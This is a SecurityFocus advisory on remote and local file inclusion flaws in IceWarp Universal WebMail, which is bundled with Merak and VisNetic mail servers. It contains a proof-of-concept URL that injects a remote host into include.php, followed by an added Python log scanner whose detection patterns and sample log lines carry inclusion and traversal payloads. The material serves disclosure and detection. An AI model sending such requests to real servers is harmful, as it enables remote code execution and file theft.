source: https://www.securityfocus.com/bid/16069/info
IceWarp Universal WebMail is prone to multiple input-validation vulnerabilities. Deerfield VisNetic Mail Server and Merak Mail Server integrate IceWarp Universal WebMail into their suites.
An attacker can exploit these issues to include arbitrary local or remote files containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Additionally, an attacker can exploit these issues to obtain the contents of local files.
Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by these issues.
UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild.
http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/
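
A log check for the request pattern shown above, as an added example that is not part of the original advisory. It assumes the web server writes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter named in the advisory's example URL, with any array indices.
PARAM_RE = re.compile(r'^lang_settings(\[[^\]]*\])*$', re.I)
# Values that point an include at a URL/stream wrapper, or out of the web tree.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)
LOCAL_RE = re.compile(r'(\.\.[\\/])|^[\\/]|^[a-z]:[\\/]|\x00', re.I)

def classify_request(target):
    """Return 'remote', 'local', 'param' or None for one request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/admin/inc/include.php'):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so %5B0%5D is matched too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if not PARAM_RE.match(name):
            continue
        if REMOTE_RE.match(value):
            return 'remote'          # remote file inclusion attempt
        if LOCAL_RE.search(value):
            verdict = 'local'        # traversal or absolute local path
        elif verdict is None:
            verdict = 'param'        # client-supplied value, lower confidence
    return verdict

def scan(lines):
    """Yield (client_ip, verdict, target) for every flagged log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_request(m.group(1))
        if verdict:
            yield line.split(' ', 1)[0], verdict, m.group(1)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2007:10:00:01 +0000] "GET /admin/inc/include.php?language=0&lang_settings[0][1]=http://host.invalid/ HTTP/1.1" 200 512',
    '192.0.2.11 - - [30/Jul/2007:10:00:05 +0000] "GET /admin/inc/include.php?language=0&lang_settings%5B0%5D%5B1%5D=..%2F..%2Fconfig%2F HTTP/1.1" 200 90',
    '192.0.2.12 - - [30/Jul/2007:10:00:09 +0000] "GET /mail/index.html?language=0 HTTP/1.1" 200 4096',
]

if __name__ == '__main__':
    for ip, verdict, target in scan(SAMPLE_LOG):
        print(ip, verdict, target)
```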